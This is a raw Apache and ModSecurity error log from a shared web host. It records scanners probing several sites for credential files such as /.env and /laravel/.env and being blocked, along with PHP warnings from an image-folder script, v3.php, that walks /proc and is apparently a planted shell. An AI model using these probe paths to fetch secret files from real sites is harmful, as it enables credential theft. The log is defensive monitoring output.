[Tue May 12 03:07:46.573465 2026] [security2:error] [pid 1730207:tid 1730233] [client 5.255.122.176:29424] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /api/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/api/.env"] [unique_id "agJ9Yjue9Sp-pIv_Bb6VHAAAAVg"]
[Tue May 12 03:07:46.573494 2026] [security2:error] [pid 1707624:tid 1707686] [client 5.255.122.176:29402] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.local"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/.env.local"] [unique_id "agJ9YrOxS7i6i_mT2NLMSwAAAEQ"]
[Tue May 12 03:07:46.573520 2026] [security2:error] [pid 1695975:tid 1695991] [client 5.255.122.176:29408] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/app/.env"] [unique_id "agJ9YtVI9ymHBxup74-P-QAAAI0"]
[Tue May 12 03:07:46.573624 2026] [security2:error] [pid 1730207:tid 1730233] [client 5.255.122.176:29424] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/api/.env"] [unique_id "agJ9Yjue9Sp-pIv_Bb6VHAAAAVg"]
[Tue May 12 03:07:46.573645 2026] [security2:error] [pid 1707624:tid 1707686] [client 5.255.122.176:29402] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/.env.local"] [unique_id "agJ9YrOxS7i6i_mT2NLMSwAAAEQ"]
[Tue May 12 03:07:46.573956 2026] [security2:error] [pid 1709071:tid 1709092] [client 5.255.122.176:29394] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "homin.fr"] [uri "/.env.production"] [unique_id "agJ9YrvMumyrWMfSu7quHAAAAMU"]
[Tue May 12 03:07:46.574176 2026] [security2:error] [pid 1709071:tid 1709092] [client 5.255.122.176:29394] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "homin.fr"] [uri "/.env.production"] [unique_id "agJ9YrvMumyrWMfSu7quHAAAAMU"]
[Tue May 12 03:07:46.597079 2026] [security2:error] [pid 1709071:tid 1709092] [client 5.255.122.176:29394] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agJ9YrvMumyrWMfSu7quHAAAAMU"]
[Tue May 12 03:07:46.597424 2026] [security2:error] [pid 1730207:tid 1730233] [client 5.255.122.176:29424] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agJ9Yjue9Sp-pIv_Bb6VHAAAAVg"]
[Tue May 12 03:07:46.600051 2026] [security2:error] [pid 1707624:tid 1707686] [client 5.255.122.176:29402] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agJ9YrOxS7i6i_mT2NLMSwAAAEQ"]
[Tue May 12 03:07:46.600481 2026] [security2:error] [pid 1730175:tid 1730193] [client 5.255.122.176:29440] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agJ9Yno6NvB9WXx5V-5-NQAAARA"]
[Tue May 12 03:07:46.600488 2026] [security2:error] [pid 1695975:tid 1695991] [client 5.255.122.176:29408] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "homin.fr"] [uri "/public/index.php"] [unique_id "agJ9YtVI9ymHBxup74-P-QAAAI0"]
[Tue May 12 03:07:47.113855 2026] [authz_core:error] [pid 1707624:tid 1707691] [client 47.128.23.21:16970] AH01630: client denied by server configuration: /home/castigli/public_html/wp-includes/Requests/Exception/error_log
[Tue May 12 03:08:08.769887 2026] [security2:error] [pid 1709071:tid 1709094] [client 43.157.156.190:50056] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/"] [unique_id "agJ9eLvMumyrWMfSu7quJwAAAMc"]
[Tue May 12 03:08:13.718257 2026] [security2:error] [pid 1709071:tid 1709104] [client 43.164.129.191:56344] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.maelbailly.fr"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agJ9fbvMumyrWMfSu7quMwAAANE"]
[Tue May 12 03:08:22.142472 2026] [autoindex:error] [pid 1730207:tid 1730212] [client 20.9.31.235:14068] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/js/jquery/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:08:23.009298 2026] [autoindex:error] [pid 1730207:tid 1730229] [client 20.9.31.235:48440] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/js/jquery/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:08:23.943546 2026] [autoindex:error] [pid 1730207:tid 1730229] [client 20.9.31.235:48440] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/js/jquery/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:08:41.155456 2026] [autoindex:error] [pid 1730207:tid 1730212] [client 20.9.31.235:14068] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:08:42.044554 2026] [autoindex:error] [pid 1707624:tid 1707704] [client 20.9.31.235:48388] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:08:42.655823 2026] [security2:error] [pid 1730207:tid 1730217] [client 101.33.55.204:40994] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.piregwan-genesis.com"] [uri "/liens/redirect.php"] [unique_id "agJ9mjue9Sp-pIv_Bb6VtgAAAUg"]
[Tue May 12 03:08:42.961188 2026] [autoindex:error] [pid 1707624:tid 1707704] [client 20.9.31.235:48388] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/css/dist/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
PHP Warning:  filesize(): stat failed for /proc/67/task/67/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/67/task/67/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/67/task/67/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/67/task/67/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/67/task/67/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/67/task/67/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:08:49.306626 2026] [autoindex:error] [pid 1730207:tid 1730212] [client 20.9.31.235:14068] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/uploads/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:08:50.204694 2026] [autoindex:error] [pid 1707624:tid 1707704] [client 20.9.31.235:48388] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-content/uploads/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704816/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704816/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704816/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704816/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1704816/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1704816/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:08:53.549225 2026] [proxy_fcgi:error] [pid 1730207:tid 1730212] [client 20.9.31.235:14068] AH01071: Got error 'Primary script unknown'
[Tue May 12 03:09:09.460669 2026] [autoindex:error] [pid 1707624:tid 1707704] [client 20.9.31.235:48388] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-includes/css/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:09:22.002770 2026] [:error] [pid 1691274:tid 1691280] [client 47.128.120.13:59940] File does not exist: /home/domaine1/public_html/erreur.php
[Tue May 12 03:09:31.981423 2026] [autoindex:error] [pid 1707624:tid 1707687] [client 20.9.31.235:17126] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 03:09:32.891276 2026] [autoindex:error] [pid 1707624:tid 1707704] [client 20.9.31.235:48388] AH01276: Cannot serve directory /home/tcttelec/dev.tct-telecom.fr/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899832/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899832/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899832/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899832/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704816/task/1899832/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704816/task/1899832/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 03:09:45.705522 2026] [security2:error] [pid 1691274:tid 1691297] [client 159.89.207.113:55664] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/core/.env"] [unique_id "agJ92VfdQaraX_prmqckMQAAABY"]
[Tue May 12 03:09:45.705525 2026] [security2:error] [pid 1730207:tid 1730210] [client 159.89.207.113:55692] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /app/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/app/.env"] [unique_id "agJ92Tue9Sp-pIv_Bb6V6gAAAUE"]
[Tue May 12 03:09:45.705533 2026] [security2:error] [pid 1695975:tid 1695980] [client 159.89.207.113:55706] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /admin/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/admin/.env"] [unique_id "agJ92dVI9ymHBxup74-QPgAAAII"]
[Tue May 12 03:09:45.705618 2026] [security2:error] [pid 1695975:tid 1695987] [client 159.89.207.113:55650] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /backend/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/backend/.env"] [unique_id "agJ92dVI9ymHBxup74-QPwAAAIk"]
[Tue May 12 03:09:45.705652 2026] [security2:error] [pid 1707624:tid 1707700] [client 159.89.207.113:55654] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/.env"] [unique_id "agJ92bOxS7i6i_mT2NLM0wAAAFI"]
[Tue May 12 03:09:45.705723 2026] [security2:error] [pid 1730207:tid 1730210] [client 159.89.207.113:55692] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/app/.env"] [unique_id "agJ92Tue9Sp-pIv_Bb6V6gAAAUE"]
[Tue May 12 03:09:45.705724 2026] [security2:error] [pid 1691274:tid 1691297] [client 159.89.207.113:55664] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/core/.env"] [unique_id "agJ92VfdQaraX_prmqckMQAAABY"]
[Tue May 12 03:09:45.705752 2026] [security2:error] [pid 1695975:tid 1695980] [client 159.89.207.113:55706] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/admin/.env"] [unique_id "agJ92dVI9ymHBxup74-QPgAAAII"]
[Tue May 12 03:09:45.705779 2026] [security2:error] [pid 1695975:tid 1695987] [client 159.89.207.113:55650] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/backend/.env"] [unique_id "agJ92dVI9ymHBxup74-QPwAAAIk"]
[Tue May 12 03:09:45.705830 2026] [security2:error] [pid 1709071:tid 1709110] [client 159.89.207.113:55666] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /laravel/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "jeanboyault.fr"] [uri "/laravel/.env"] [unique_id "agJ92bvMumyrWMfSu7qubgAAANc"]
[Tue May 12 03:09:45.705873 2026] [security2:error] [pid 1707624:tid 1707700] [client 159.89.207.113:55654] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/.env"] [unique_id "agJ92bOxS7i6i_mT2NLM0wAAAFI"]
[Tue May 12 03:09:45.705982 2026] [security2:error] [pid 1709071:tid 1709110] [client 159.89.207.113:55666] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "jeanboyault.fr"] [uri "/laravel/.env"] [unique_id "agJ92bvMumyrWMfSu7qubgAAANc"]
